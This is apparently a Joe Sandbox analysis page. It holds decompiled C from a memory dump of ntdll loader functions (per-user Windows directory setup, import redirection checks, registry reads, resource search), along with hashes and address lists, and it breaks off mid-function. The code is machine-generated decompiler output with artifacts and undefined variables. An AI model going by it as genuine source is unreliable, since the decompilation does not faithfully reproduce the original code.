0x04d25ab2
0x04d25aba
0x04d25aba
0x04d25abf
0x04d25abf
0x00000000
0x04ce9081
0x04ce906d
0x04d25a56
0x04d25a5c
0x04d25a6a
0x04d25a70
0x04ce9136
0x04ce913d
0x04ce913e
0x04ce913f
0x04ce914a
0x04ce914a

Strings

@, xrefs: 04CE9068
&, xrefs: 04D25B03
%, xrefs: 04D25B4A

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: %$&$@
API String ID: 0-1537733988
Opcode ID: dc6a02af4bcb68e8ce2397b5095867314622879073badcf1cbca77f60f407f79
Instruction ID: 4bed0ef2a5b96953e9c34db69ba3731fa07b20ee41884615370db1fc0dbf027b
Opcode Fuzzy Hash: dc6a02af4bcb68e8ce2397b5095867314622879073badcf1cbca77f60f407f79
Instruction Fuzzy Hash: F371CDB4608302AFD720DF26C590A3BBBE6FF88318F148A1DE49647291D731F905DB92

Uniqueness

Uniqueness Score: -1.00%

Function 04CACC68 Relevance: 3.9, Strings: 3, Instructions: 164
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E04CACC68(void* __ecx, short* __edx, short* _a4) {
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t58;
				signed int _t73;
				signed short* _t74;
				signed int _t75;
				signed short* _t77;
				signed int _t82;
				short* _t92;
				signed short* _t93;
				short* _t95;
				void* _t96;
				signed int _t98;
				void* _t100;
				void* _t101;

				_t79 = __ecx;
				_t100 = (_t98 & 0xfffffff8) - 0x34;
				_t95 = __edx;
				_v44 = __edx;
				_t77 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t96 = 0xc000000d;
				} else {
					_t92 = _a4;
					if(_t92 == 0) {
						goto L28;
					}
					_t77 = E04CAD818(__ecx, 0xac);
					if(_t77 == 0) {
						_t96 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E04CF2A80();
						}
						if(_t77 != 0) {
							E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t77);
						}
						return _t96;
					}
					E04CF8F40(_t77, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t101 = _t100 + 0xc;
					 *_t95 = 0;
					 *_t92 = 0;
					E04CF5050(_t79,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v32 = 0;
					_push( &_v36);
					_push(0x20019);
					_v24 = 0x40;
					_push( &_v64);
					_v20 = 0;
					_v16 = 0;
					_t96 = E04CF2AB0();
					if(_t96 < 0) {
						goto L6;
					}
					E04CF5050(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t96 = E04CAD64A(_v64,  &_v44,  &_v56, _t77,  &_v48);
					if(_t96 >= 0) {
						if(_v52 != 1) {
							L17:
							_t96 = 0xc0000001;
							goto L6;
						}
						_t58 =  *_t77 & 0x0000ffff;
						_t93 = _t77;
						_t82 = _t58;
						if(_t58 == 0) {
							L19:
							if(_t82 == 0) {
								L23:
								E04CF5050(_t82, _t101 + 0x24, _t77);
								if(E04CD56E0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t83 = _v48;
								 *_v48 = _v56;
								if( *_t93 != 0) {
									E04CF5050(_t83, _t101 + 0x24, _t93);
									if(E04CD56E0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t96 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t82 = _t82 & 0x0000ffff;
							while(_t82 == 0x20) {
								_t93 =  &(_t93[1]);
								_t73 =  *_t93 & 0x0000ffff;
								_t82 = _t73;
								if(_t73 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t26 =  &(_t93[1]); // 0x2
							_t74 = _t26;
							if(_t82 == 0x2c) {
								break;
							}
							_t93 = _t74;
							_t75 =  *_t93 & 0x0000ffff;
							_t82 = _t75;
							if(_t75 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t93 = 0;
						_t93 = _t74;
						_t82 =  *_t74 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x04cacc68
0x04cacc70
0x04cacc77
0x04cacc79
0x04cacc7d
0x04cacc7f
0x04cacc86
0x04d0a26b
0x04d0a26b
0x04cacc94
0x04cacc94
0x04cacc99
0x00000000
0x00000000
0x04cacca9
0x04caccad
0x04d0a192
0x04cacd59
0x04cacd5e
0x04cacd60
0x04cacd64
0x04cacd64
0x04cacd6b
0x04cacd7a
0x04cacd7a
0x04cacd87
0x04cacd87
0x04caccbb
0x04caccc0
0x04caccc5
0x04caccca
0x04cacccd
0x04caccda
0x04cacce3
0x04cacceb
0x04caccf5
0x04caccf9
0x04caccfa
0x04cacd03
0x04cacd0b
0x04cacd0c
0x04cacd10
0x04cacd19
0x04cacd1d
0x00000000
0x00000000
0x04cacd29
0x04cacd2e
0x04cacd3d
0x04cacd4f
0x04cacd53
0x04d0a1a1
0x04d0a1c6
0x04d0a1c6
0x00000000
0x04d0a1c6
0x04d0a1a3
0x04d0a1a6
0x04d0a1a8
0x04d0a1ad
0x04d0a1da
0x04d0a1dd
0x04d0a1f5
0x04d0a1fb
0x04d0a211
0x00000000
0x00000000
0x04d0a213
0x04d0a21c
0x04d0a224
0x04d0a230
0x04d0a246
0x04d0a263
0x04d0a248
0x04d0a24e
0x04d0a253
0x04d0a253
0x04d0a246
0x00000000
0x04d0a224
0x04d0a1df
0x04d0a1e2
0x04d0a1e8
0x04d0a1eb
0x04d0a1ee
0x04d0a1f3
0x00000000
0x00000000
0x00000000
0x04d0a1f3
0x00000000
0x00000000
0x00000000
0x00000000
0x04d0a1af
0x04d0a1af
0x04d0a1af
0x04d0a1af
0x04d0a1b6
0x00000000
0x00000000
0x04d0a1b8
0x04d0a1ba
0x04d0a1bd
0x04d0a1c2
0x00000000
0x00000000
0x00000000
0x04d0a1c4
0x04d0a1d2
0x04d0a1d5
0x04d0a1d7
0x00000000
0x04d0a1d7
0x04cacd53

Strings

InstallLanguageFallback, xrefs: 04CACD1F
@, xrefs: 04CACD03
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 04CACCD4

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: fdce6fa0baabcc16c2d836d3307816e3dc40786f075df4beab645e4def03f601
Instruction ID: fa28ab90f980b911cdf2738013f01c159366b8f872d322172d1f38ae97a1b524
Opcode Fuzzy Hash: fdce6fa0baabcc16c2d836d3307816e3dc40786f075df4beab645e4def03f601
Instruction Fuzzy Hash: 2D51E4769043069BD710DF64C840B6BB7E9BF88718F04492EF985D3390E734E90597A2

Uniqueness

Uniqueness Score: -1.00%

Function 04CEC640 Relevance: 3.9, Strings: 3, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E04CEC640(void* __ebx, signed int __ecx, void* __edx, void* __edi) {
				signed int _v20;
				signed int _v36;
				char _v544;
				char _v552;
				char _v556;
				char* _v560;
				short _v562;
				signed int _v564;
				short _v570;
				char _v572;
				signed int _v580;
				char _v588;
				signed int _v604;
				signed short _v608;
				void* __esi;
				void* __ebp;
				void* _t25;
				signed int* _t27;
				signed int _t39;
				signed int _t42;
				signed int _t54;
				signed char _t56;
				signed int* _t58;
				intOrPtr* _t65;
				signed int _t67;
				void* _t70;
				signed int _t72;
				signed int _t75;
				void* _t77;
				signed int _t80;
				void* _t82;
				signed int _t85;
				signed int _t87;

				_t70 = __edx;
				_push(__ebx);
				_push(__edi);
				_t72 = __ecx;
				_t25 = E04CD0130();
				if(_t25 != 0) {
					L04CC2330(_t25, 0x4da5b5c);
					_t27 =  *0x4da9224; // 0x0
					_t75 =  *_t27;
					__eflags = _t72;
					if(_t72 != 0) {
						__eflags = _t75;
						if(_t75 == 0) {
							goto L13;
						} else {
							_t80 = _t75 - 1;
							goto L7;
						}
					} else {
						__eflags = _t75;
						if(_t75 == 0) {
							E04CA9050( *0x4da921c, _t75);
						}
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							L13:
							E04CC24D0(0x4da5b5c);
							_t65 = 0xe;
							asm("int 0x29");
							_t87 = (_t85 & 0xfffffff8) - 0x224;
							_v20 =  *0x4dab370 ^ _t87;
							_t76 = _t65;
							 *0x4da91e0( &_v544, 0x104, _t75, _t82);
							_t67 =  *_t65() + _t33;
							__eflags = _t67;
							if(_t67 != 0) {
								__eflags =  *0x4da660c;
								_v560 =  &_v552;
								_v564 = _t67;
								_v562 = 0x208;
								if(__eflags == 0) {
									L25:
									_push( &_v556);
									_push( &_v564);
									E04D3CB20(0x4da5b5c, _t72, _t76, __eflags);
									goto L15;
								} else {
									_t76 = ( *0x4da6608 & 0x0000ffff) + 2 + _t67;
									_t42 = E04CC5D90(_t67,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t76);
									_v580 = _t42;
									__eflags = _t42;
									if(_t42 != 0) {
										__eflags = 0;
										_v570 = _t76;
										_v572 = 0;
										E04CD10D0(_t67,  &_v572, 0x4da6608);
										E04CD10D0(_t67,  &_v580,  &_v572);
										E04CBFE40(_t67,  &_v588, ";");
										E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *0x4da660c);
										 *0x4da6608 = _v608;
										_t54 = _v604;
										 *0x4da660c = _t54;
										 *0x4da6604 = _t54;
										E04D3D4A0(_t67, __eflags);
										goto L25;
									} else {
										_t56 =  *0x4da37c0; // 0x0
										__eflags = _t56 & 0x00000003;
										if((_t56 & 0x00000003) != 0) {
											_push("Failed to reallocate the system dirs string !\n");
											_push(0);
											_push("LdrpInitializePerUserWindowsDirectory");
											_push(0xcf4);
											_push("minkernel\\ntdll\\ldrinit.c");
											E04D2E692();
											_t56 =  *0x4da37c0; // 0x0
											_t87 = _t87 + 0x14;
										}
										__eflags = _t56 & 0x00000010;
										if((_t56 & 0x00000010) != 0) {
											asm("int3");
										}
										_t39 = 0xc0000017;
									}
								}
							} else {
								L15:
								_t39 = 0;
								__eflags = 0;
							}
							_pop(_t77);
							__eflags = _v36 ^ _t87;
							return E04CF4B50(_t39, 0x4da5b5c, _v36 ^ _t87, _t70, _t72, _t77);
						} else {
							_t80 = _t75 + 1;
							__eflags = _t80;
							L7:
							_t58 =  *0x4da9224; // 0x0
							 *_t58 = _t80;
							__eflags = _t72;
							if(_t72 != 0) {
								__eflags = _t80;
								if(_t80 == 0) {
									E04CA9050( *0x4da921c, 1);
								}
							}
							_t25 = E04CC24D0(0x4da5b5c);
							goto L1;
						}
					}
				} else {
					L1:
					return _t25;
				}
			}

0x04cec640
0x04cec642
0x04cec644
0x04cec645
0x04cec647
0x04cec64e
0x04cec65a
0x04cec65f
0x04cec664
0x04cec666
0x04cec668
0x04cec6a4
0x04cec6a6
0x00000000
0x04cec6a8
0x04cec6a8
0x00000000
0x04cec6a8
0x04cec66a
0x04cec66a
0x04cec66c
0x04cec675
0x04cec675
0x04cec67a
0x04cec67d
0x04cec6ab
0x04cec6ac
0x04cec6b3
0x04cec6b4
0x04cec6be
0x04cec6cb
0x04cec6dc
0x04cec6df
0x04cec6e9
0x04cec6e9
0x04cec6eb
0x04d28090
0x04d2809b
0x04d280a4
0x04d280a9
0x04d280ae
0x04d2817f
0x04d28183
0x04d28188
0x04d28189
0x00000000
0x04d280b4
0x04d280c4
0x04d280cc
0x04d280d1
0x04d280d5
0x04d280d7
0x04d28114
0x04d28116
0x04d2811b
0x04d2812a
0x04d28139
0x04d28148
0x04d2815e
0x04d28167
0x04d2816c
0x04d28170
0x04d28175
0x04d2817a
0x00000000
0x04d280d9
0x04d280d9
0x04d280de
0x04d280e0
0x04d280e2
0x04d280e7
0x04d280e9
0x04d280ee
0x04d280f3
0x04d280f8
0x04d280fd
0x04d28102
0x04d28102
0x04d28105
0x04d28107
0x04d28109
0x04d28109
0x04d2810a
0x04d2810a
0x04d280d7
0x04cec6f1
0x04cec6f1
0x04cec6f1
0x04cec6f1
0x04cec6f1
0x04cec6fa
0x04cec6fb
0x04cec705
0x04cec67f
0x04cec67f
0x04cec67f
0x04cec680
0x04cec680
0x04cec685
0x04cec687
0x04cec689
0x04cec68b
0x04cec68d
0x04cec697
0x04cec697
0x04cec68d
0x04cec69d
0x00000000
0x04cec69d
0x04cec67d
0x04cec650
0x04cec650
0x04cec653
0x04cec653

Strings

minkernel\ntdll\ldrinit.c, xrefs: 04D280F3
Failed to reallocate the system dirs string !, xrefs: 04D280E2
LdrpInitializePerUserWindowsDirectory, xrefs: 04D280E9

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: 4abcb185ff45fd6cf44dba21a172efd3349378927aff344c104fccd11ca3d1cb
Instruction ID: 4361e74f9553187027cfb7cc56a487d65310af1c0db8a52d695f839202acc87c
Opcode Fuzzy Hash: 4abcb185ff45fd6cf44dba21a172efd3349378927aff344c104fccd11ca3d1cb
Instruction Fuzzy Hash: CE41F4B1A10310EBD720EF25DD54B6B77EAEF44758F08496AF98893290EB34F8109B91

Uniqueness

Uniqueness Score: -1.00%

Function 04D343D5 Relevance: 3.9, Strings: 3, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E04D343D5(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __esi;
				signed char _t37;
				signed int _t41;
				intOrPtr _t44;
				signed int _t49;
				signed int _t50;
				signed int _t51;
				signed int _t52;
				void* _t54;
				signed int _t59;
				signed int _t60;
				signed int _t64;
				signed int _t66;
				intOrPtr _t68;
				signed int _t69;
				intOrPtr _t70;

				_t68 = _a4;
				_t54 = __edx;
				_v28 = __ecx;
				_v24 = E04D34B46(_t68);
				_v12 =  *((intOrPtr*)(_t54 + 0x2c));
				_v8 =  *((intOrPtr*)(_t54 + 0x30));
				_v20 =  *((intOrPtr*)(_t54 + 0x90));
				_t37 =  *0x4da6714; // 0x0
				_v16 = _t68;
				_t69 =  *0x4da6710; // 0x0
				if((_t37 & 0x00000001) != 0) {
					if(_t69 == 0) {
						_t69 = 0;
						__eflags = 0;
					} else {
						_t69 = _t69 ^ 0x04da6710;
					}
				}
				_t64 = _t37 & 1;
				while(_t69 != 0) {
					__eflags = E04D34528(_t54, _t69,  &_v24, _t69);
					if(__eflags >= 0) {
						if(__eflags <= 0) {
							L25:
							while(_t69 != 0) {
								_t41 = E04D34528(_t54, _t69,  &_v24, _t69);
								__eflags = _t41;
								if(_t41 != 0) {
									break;
								}
								_t66 =  *0x4da5ca0; // 0x0
								__eflags = _t66;
								if(_t66 == 0) {
									L28:
									__eflags =  *0x4da37c0 & 0x00000005;
									_t70 =  *((intOrPtr*)(_t69 + 0x20));
									if(( *0x4da37c0 & 0x00000005) != 0) {
										_t44 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
										_push( *((intOrPtr*)(_t44 + 0x2a8)));
										_push( *((intOrPtr*)(_t44 + 0x2a4)));
										_push(_a4);
										_push( *((intOrPtr*)(_t54 + 0x30)));
										_push( *((intOrPtr*)(_t54 + 0x2c)));
										_push( *((intOrPtr*)(_v28 + 0x30)));
										E04D2E692("minkernel\\ntdll\\ldrredirect.c", 0x12b, "LdrpCheckRedirection", 2, "Import Redirection: %wZ %wZ!%s redirected to %wZ\n",  *((intOrPtr*)(_v28 + 0x2c)));
									}
									L27:
									return _t70;
								}
								 *0x4da91e0( *((intOrPtr*)(_v28 + 0x28)),  *((intOrPtr*)(_t69 + 0x24)));
								_t49 =  *_t66();
								__eflags = _t49;
								if(_t49 != 0) {
									goto L28;
								}
								_t50 =  *(_t69 + 4);
								_t59 = _t69;
								__eflags = _t50;
								if(_t50 == 0) {
									while(1) {
										_t69 =  *(_t69 + 8) & 0xfffffffc;
										__eflags = _t69;
										if(_t69 == 0) {
											goto L25;
										}
										__eflags =  *_t69 - _t59;
										if( *_t69 == _t59) {
											goto L25;
										}
										_t59 = _t69;
									}
									continue;
								}
								_t69 = _t50;
								_t60 =  *_t69;
								__eflags = _t60;
								if(_t60 == 0) {
									continue;
								} else {
									goto L20;
								}
								do {
									L20:
									_t51 =  *_t60;
									_t69 = _t60;
									_t60 = _t51;
									__eflags = _t51;
								} while (_t51 != 0);
							}
							_t70 = 0xffbadd11;
							goto L27;
						}
						_t52 =  *(_t69 + 4);
						L9:
						__eflags = _t64;
						if(_t64 == 0) {
							L12:
							_t69 = _t52;
							continue;
						}
						__eflags = _t52;
						if(_t52 == 0) {
							goto L12;
						}
						_t69 = _t69 ^ _t52;
						continue;
					}
					_t52 =  *_t69;
					goto L9;
				}
				goto L25;
			}

0x04d343e2
0x04d343e5
0x04d343e7
0x04d343f3
0x04d343fa
0x04d34401
0x04d3440b
0x04d3440f
0x04d34414
0x04d34418
0x04d34420
0x04d34424
0x04d3442e
0x04d3442e
0x04d34426
0x04d34426
0x04d34426
0x04d34424
0x04d34433
0x04d3445e
0x04d34443
0x04d34445
0x04d3444b
0x00000000
0x04d344c0
0x04d3446a
0x04d3446f
0x04d34471
0x00000000
0x00000000
0x04d34473
0x04d34479
0x04d3447b
0x04d344d4
0x04d344d4
0x04d344db
0x04d344de
0x04d344e6
0x04d344e9
0x04d344ef
0x04d344f9
0x04d344fc
0x04d344ff
0x04d34502
0x04d3451e
0x04d34523
0x04d344c9
0x04d344d1
0x04d344d1
0x04d34489
0x04d3448f
0x04d34491
0x04d34493
0x00000000
0x00000000
0x04d34495
0x04d34498
0x04d3449a
0x04d3449c
0x04d344b8
0x04d344bb
0x04d344bb
0x04d344be
0x00000000
0x00000000
0x04d344b2
0x04d344b4
0x00000000
0x00000000
0x04d344b6
0x04d344b6
0x00000000
0x04d344b8
0x04d3449e
0x04d344a0
0x04d344a2
0x04d344a4
0x00000000
0x00000000
0x00000000
0x00000000
0x04d344a6
0x04d344a6
0x04d344a6
0x04d344a8
0x04d344aa
0x04d344ac
0x04d344ac
0x04d344b0
0x04d344c4
0x00000000
0x04d344c4
0x04d3444d
0x04d34450
0x04d34450
0x04d34452
0x04d3445c
0x04d3445c
0x00000000
0x04d3445c
0x04d34454
0x04d34456
0x00000000
0x00000000
0x04d34458
0x00000000
0x04d34458
0x04d34447
0x00000000
0x04d34447
0x00000000

Strings

Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 04D34508
minkernel\ntdll\ldrredirect.c, xrefs: 04D34519
LdrpCheckRedirection, xrefs: 04D3450F

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: b846cac7e0b5bd740b004dbcc69a0bf4fd609a61f70304b81e4cc1e887b58b2a
Instruction ID: 4fad6b99c81f77d8a05f0e14fa3deaf8b56aa02103d914d08f82084c7a809027
Opcode Fuzzy Hash: b846cac7e0b5bd740b004dbcc69a0bf4fd609a61f70304b81e4cc1e887b58b2a
Instruction Fuzzy Hash: 4341C132B04211AFCB20CF58D940A26B7E5FF4875AB0906B9EC9897351D7B8FC108B91

Uniqueness

Uniqueness Score: -1.00%

Function 04D50F49 Relevance: 3.9, Strings: 3, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E04D50F49(intOrPtr* __ecx, void* __eflags) {
				char _v8;
				char _v12;
				intOrPtr* _v16;
				char _v20;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char* _v44;
				intOrPtr _v48;
				char _v52;
				intOrPtr _t52;
				intOrPtr _t53;
				void* _t55;
				void* _t56;

				_t54 = __ecx;
				_v16 = __ecx;
				E04CF5050(__ecx,  &_v28, L"\\REGISTRY\\MACHINE\\SYSTEM\\CurrentControlSet\\Control");
				_v52 = 0x18;
				_v44 =  &_v28;
				_t52 = 0;
				_v48 = 0;
				_push( &_v52);
				_push(0x20019);
				_v40 = 0x40;
				_push( &_v12);
				_v36 = 0;
				_v32 = 0;
				_t56 = E04CF2AB0();
				if(_t56 >= 0) {
					E04CF5050(__ecx,  &_v28, L"OsBootstatPath");
					_push( &_v8);
					_push(0);
					_push(0);
					_push(2);
					_push( &_v28);
					_push(_v12);
					_t56 = E04CF2B00();
					if(_t56 == 0xc0000023) {
						_t55 = E04CC5D90(_t54,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
						if(_t55 != 0) {
							_push( &_v20);
							_push(_v8);
							_push(_t55);
							_push(2);
							_push( &_v28);
							_push(_v12);
							_t56 = E04CF2B00();
							if(_t56 >= 0) {
								_t53 = E04CC5D90(_t54,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t55 + 8)));
								if(_t53 != 0) {
									_t25 = _t55 + 0xc; // 0xc
									E04CF88C0(_t53, _t25,  *((intOrPtr*)(_t55 + 8)));
									 *_v16 = _t53;
								} else {
									_t56 = 0xc0000017;
								}
								_t52 = 0;
							}
							E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t55);
						} else {
							_t56 = 0xc0000017;
						}
					} else {
						if(_t56 >= 0) {
							_t56 = 0xc0000001;
						}
					}
				}
				return _t56;
			}

0x04d50f49
0x04d50f5c
0x04d50f60
0x04d50f68
0x04d50f6f
0x04d50f72
0x04d50f77
0x04d50f7a
0x04d50f7b
0x04d50f83
0x04d50f8a
0x04d50f8b
0x04d50f8e
0x04d50f96
0x04d50f9a
0x04d50fa9
0x04d50fb1
0x04d50fb2
0x04d50fb3
0x04d50fb4
0x04d50fb9
0x04d50fba
0x04d50fc2
0x04d50fca
0x04d50ff0
0x04d50ff4
0x04d51000
0x04d51001
0x04d51007
0x04d51008
0x04d5100a
0x04d5100b
0x04d51013
0x04d51017
0x04d5102b
0x04d5102f
0x04d5103b
0x04d51040
0x04d5104b
0x04d51031
0x04d51031
0x04d51031
0x04d5104d
0x04d5104d
0x04d5105a
0x04d50ff6
0x04d50ff6
0x04d50ff6
0x04d50fcc
0x04d50fce
0x04d50fd4
0x04d50fd4
0x04d50fce
0x04d50fca
0x04d51065

Strings

OsBootstatPath, xrefs: 04D50FA0
\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control, xrefs: 04D50F54
@, xrefs: 04D50F83

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID: InitializeThunk
String ID: @$OsBootstatPath$\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control
API String ID: 2994545307-1050206962
Opcode ID: 1f52986ad8700d75acc15b24fc0595669a4ebff55ac952584c03a7276d22dfb8
Instruction ID: 166e8ae0301512a25b66c0f999f69a9c08537aa86f53a248f41d1adccc6cad87
Opcode Fuzzy Hash: 1f52986ad8700d75acc15b24fc0595669a4ebff55ac952584c03a7276d22dfb8
Instruction Fuzzy Hash: BD314471D00269BFDB11DF94CC84EAEBB7EEB04754F410465EA00A7221D779ED459BA0

Uniqueness

Uniqueness Score: -1.00%

Function 04CBA8F0 Relevance: 2.9, Strings: 2, Instructions: 421
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E04CBA8F0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				short _t151;
				short _t152;
				signed int* _t154;
				signed char* _t155;
				signed int _t156;
				signed int _t157;
				signed int* _t160;
				signed int _t161;
				signed int _t163;
				signed int _t167;
				signed int _t169;
				signed int _t171;
				signed int _t173;
				signed int _t179;
				signed int _t180;
				signed int _t185;
				signed int _t186;
				signed int _t191;
				signed int _t196;
				signed int _t198;
				signed int _t200;
				signed int _t206;
				signed int _t210;
				signed int _t211;
				signed int _t213;
				signed int _t214;
				signed int _t225;
				short _t227;
				signed char* _t229;
				signed int _t246;
				intOrPtr _t254;
				signed int _t256;
				signed int _t257;
				signed int _t259;
				signed int _t263;
				intOrPtr _t265;
				signed int _t267;
				signed int _t268;
				void* _t270;
				signed int _t290;

				_push(0x74);
				_push(0x4d8bf08);
				E04D07C40(__ebx, __edi, __esi);
				_t263 =  *(_t270 + 8);
				 *(_t270 - 0x3c) = _t263;
				_t246 =  *(_t270 + 0xc);
				 *(_t270 - 0x50) = _t246;
				 *((intOrPtr*)(_t270 - 0x4c)) =  *((intOrPtr*)(_t270 + 0x18));
				 *(_t270 - 0x44) =  *(_t270 + 0x1c);
				_t254 =  *((intOrPtr*)(_t270 + 0x20));
				 *((intOrPtr*)(_t270 - 0x48)) = _t254;
				 *(_t270 - 0x40) =  *(_t270 + 0x24);
				 *(_t270 - 0x38) = 0;
				_t227 = 0x34;
				 *((short*)(_t270 - 0x74)) = _t227;
				_t151 = 0x36;
				 *((short*)(_t270 - 0x72)) = _t151;
				 *(_t270 - 0x70) = L"LdrResSearchResource Enter";
				_t152 = 0x32;
				 *((short*)(_t270 - 0x7c)) = _t152;
				 *((short*)(_t270 - 0x7a)) = _t227;
				 *(_t270 - 0x78) = L"LdrResSearchResource Exit";
				_t154 =  *( *[fs:0x30] + 0x50);
				if(_t154 != 0) {
					__eflags =  *_t154;
					if( *_t154 == 0) {
						goto L1;
					}
					_t155 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
					L2:
					if(( *_t155 & 0x00000001) != 0) {
						_t156 = E04CC3C40();
						_t222 = 0x7ffe0384;
						__eflags = _t156;
						if(_t156 == 0) {
							_t157 = 0x7ffe0384;
						} else {
							_t157 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
						}
						E04D3FC01(_t270 - 0x74,  *_t157 & 0x000000ff);
						_t246 =  *(_t270 - 0x50);
					} else {
						_t222 = 0x7ffe0384;
					}
					if(_t263 == 0 || _t246 == 0) {
						L56:
						 *(_t270 - 0x30) = 0xc000000d;
						goto L22;
					} else {
						if(_t254 != 0) {
							__eflags =  *(_t270 - 0x40);
							if( *(_t270 - 0x40) != 0) {
								goto L7;
							}
							goto L56;
						}
						L7:
						_t225 =  *(_t270 + 0x14);
						if((_t225 & 0x00000f00) == 0) {
							_t225 = _t225 | 0x00000100;
						}
						if((_t225 & 0x00002000) == 0) {
							_t225 = _t225 | 0x00001000;
						}
						if((_t225 & 0xfff80000) != 0) {
							L20:
							 *(_t270 - 0x30) = 0xc00000f2;
							goto L21;
						} else {
							_t256 =  *(_t270 + 0x10);
							if(_t256 < 3) {
								__eflags = _t225 & 0x00000002;
								if((_t225 & 0x00000002) != 0) {
									goto L12;
								}
								L57:
								 *(_t270 - 0x30) = 0xc00000f1;
								L21:
								_t222 = 0x7ffe0384;
								L22:
								_t229 = 0x7ffe0385;
								_t160 =  *( *[fs:0x30] + 0x50);
								if(_t160 != 0) {
									__eflags =  *_t160;
									if( *_t160 != 0) {
										_t229 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
									}
								}
								if(( *_t229 & 0x00000001) != 0) {
									_t161 = E04CC3C40();
									__eflags = _t161;
									if(_t161 != 0) {
										_t222 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
										__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
									}
									E04D3FC01(_t270 - 0x7c,  *_t222 & 0x000000ff);
									goto L24;
								} else {
									L24:
									_t163 =  *(_t270 - 0x30);
									L25:
									 *[fs:0x0] =  *((intOrPtr*)(_t270 - 0x10));
